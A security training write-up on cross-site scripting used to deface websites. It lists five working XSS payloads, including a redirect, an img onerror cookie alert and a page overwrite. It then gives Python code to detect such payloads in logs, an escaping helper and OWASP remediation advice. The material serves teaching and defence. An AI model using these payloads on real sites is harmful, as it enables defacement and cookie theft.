Cross Site Scripting - Web Defacement Techniques
Ronan Dunne, CEH, SSCP
Introduction
• Website defacement is an attack on a website that changes the visual appearance of the site or of a single webpage. Defacing is one of the most common things an attacker does once they have found a vulnerability in a website.
• Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.
Testing
• A test value is entered and the request captured each time using OWASP's ZAP proxy. Once captured, the test value is replaced with our malicious code, bypassing the client-side preventions the web site has in place.
1. Redirect to a "hacked" image outside the app domain
<script>window.location="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg";</script>
2. Add a "hacked" image to the page
<img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg" onerror=alert(document.cookie);>
3. Cover the full page with "HACKED", within the app domain
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
4. Change the background to red, within the app domain
<script>document.body.bgColor="red";</script>
5. Set the background to the "hacked" image, within the app domain
<script>document.body.background="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg";</script>
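As an added example (not part of the deck), detection logic in Python that scans access-log lines for the five payload shapes listed above: a script block, an event handler on an injected image, rewriting of document.body, and a window.location redirect. The log lines are constructed for the example and the guestbook endpoint is hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Patterns for the payload shapes shown in the slides. Input is URL-decoded
# first because that is how it arrives in a captured query string.
DEFACEMENT_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon(?:error|load)\s*=", re.I),
    "body_rewrite": re.compile(r"document\.body\.(?:innerHTML|bgColor|background)", re.I),
    "redirect": re.compile(r"window\.location\s*=", re.I),
}

# Apache combined-style request line: "<METHOD> <path?query> HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_input(value):
    """Return the names of every defacement pattern present in one raw parameter value."""
    decoded = unquote_plus(value)
    return [name for name, rx in DEFACEMENT_PATTERNS.items() if rx.search(decoded)]


def scan_log(lines):
    """Return (line_number, matched_patterns) for each log line whose query string matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]  # everything after the first '?'
        found = classify_input(query)
        if found:
            hits.append((number, found))
    return hits


# Constructed sample access-log lines for a hypothetical /guestbook endpoint; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /guestbook?msg=hello+there HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /guestbook?msg=%3Cscript%3Ewindow.location%3D%22http%3A%2F%2Fexample.org%2Fhacked.jpg%22%3B%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /guestbook?msg=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /guestbook?msg=%3Cscript%3Edocument.body.bgColor%3D%22red%22%3B%3C%2Fscript%3E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

The regexes are deliberately loose so that spacing and case variations still match; tune them against your own traffic before alerting on them.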
Remediation
1. Use regular expressions on the server side to filter out all hazardous input when possible. If any of these characters are needed by the application, proper escaping is enough. A non-comprehensive list of characters likely to be part of an attack vector is:
• <> (angle brackets)
• () (parentheses)
• " (quotation mark)
• & (ampersand)
• ' (single apostrophe)
• + (plus sign)
• % (percent sign)
• = (equals sign)
• : (colon)
• ` (back tick)
• ; (semicolon)
• ´ (acute accent)
2. Escape all untrusted output before presenting it in the UI. Follow the rules in the OWASP XSS Prevention Cheat Sheet to ensure proper escaping for every context and location:
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
3. When possible, enforce a specific charset encoding (using the 'Content-Type' header or a <meta> tag).
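As an added example (not the deck's own code), a minimal Python rendering helper that applies the three controls above together: it flags input containing the listed characters, escapes each untrusted value for the HTML context it lands in (element body, quoted attribute, URL parameter), and pins the response charset. The guestbook entry and the field names are hypothetical.

```python
import html
import re
from urllib.parse import quote

# The characters the slides list as likely attack-vector components. Used to
# decide whether a value must be escaped (or rejected, for fields that never need them).
HAZARDOUS = re.compile(r'[<>()"&\'+%=:`´;]')


def needs_escaping(value):
    return bool(HAZARDOUS.search(value))


def escape_html_body(value):
    """Element content context: entity-encode & < > " and '."""
    return html.escape(value, quote=True)


def escape_html_attr(value):
    """Quoted attribute context: entity-encode every non-alphanumeric character."""
    return "".join(c if c.isalnum() else f"&#x{ord(c):X};" for c in value)


def escape_url_param(value):
    """URL parameter context: percent-encode before placing the value in an href or src."""
    return quote(value, safe="")


def render_guestbook_entry(author, message):
    """Build the HTML fragment with each untrusted value escaped for its own context."""
    return (f'<div class="entry" data-author="{escape_html_attr(author)}">'
            f"<p>{escape_html_body(message)}</p></div>")


def response_headers():
    """Pin the charset so the browser cannot sniff an encoding the escaping did not anticipate."""
    return {"Content-Type": "text/html; charset=UTF-8"}


# Constructed sample: the "cover full page" payload from the slides, submitted as a message.
PAYLOAD = '<script>document.body.innerHTML="<h1>THIS SITE WAS HACKED</h1>";</script>'

if __name__ == "__main__":
    print(needs_escaping(PAYLOAD))
    print(render_guestbook_entry('a" onmouseover="x', PAYLOAD))
```

Rendered this way the payload is shown to the visitor as literal text rather than executed, and the attribute escaping keeps an attacker-supplied author name from closing the data-author quote.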

Cross Site Scripting - Web Defacement Techniques
